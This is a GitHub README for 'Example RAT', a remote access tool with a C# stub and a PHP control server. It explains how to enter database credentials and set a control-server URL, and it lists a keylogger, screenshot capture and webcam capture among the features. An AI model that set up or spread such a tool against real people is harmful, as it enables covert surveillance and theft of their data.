Skip to content

Latest commit

 

History

History
18 lines (10 loc) · 946 Bytes

File metadata and controls

18 lines (10 loc) · 946 Bytes

Example RAT

This project is for demonstrational purposes only and should not be used maliciously. I am not responsible for any damages that occur from use of this tool.

find this line in all php files and add your credintials and link to database and database name

$db = new mysqli('link to data base here', 'user here','password here', 'data base name here');

in program.cs file line 73 find this line and set url for your control server

   ConnectionIPHandler.IPSet("UrlForYourControlServer");

Example RAT is a remote administration tool written in C# for the stub and PHP for the front-end control server.

simpleAdminFrontEnd simpleAdminAdminPage

Features include: Basic keylogger, desktop screenshot, webcam capture, etc.